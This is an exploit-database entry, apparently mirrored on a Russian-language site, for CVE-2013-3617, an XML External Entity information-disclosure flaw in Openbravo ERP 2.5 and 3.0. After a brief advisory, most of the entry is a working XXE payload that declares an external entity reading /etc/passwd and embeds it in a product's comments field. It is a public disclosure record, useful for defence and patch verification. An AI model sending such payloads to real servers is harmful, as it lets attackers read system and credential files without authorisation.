- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 38818
- Проверка EDB
-
- Пройдено
- Автор
- TOD BEARDSLEY
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- cve-2013-3617
- Дата публикации
- 2013-10-30
Openbravo ERP - XML External Entity Information Disclosure
XML:
source: https://www.securityfocus.com/bid/63431/info
Openbravo ERP is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.
Openbravo ERP 2.5 and 3.0 are vulnerable.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT comments ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<ob:Openbravo xmlns:ob="http://www.example.com"
xmlns:xsi="http://www.example1.com/2001/XMLSchema-instance">
<Product id="C970393BDF6C43E2B030D23482D88EED" identifier="Zumo de Piñ,5L">
<id>C970393BDF6C43E2B030D23482D88EED</id>
<comments>&xxe;</comments>
</Product>
</ob:Openbravo>- Источник
- www.exploit-db.com
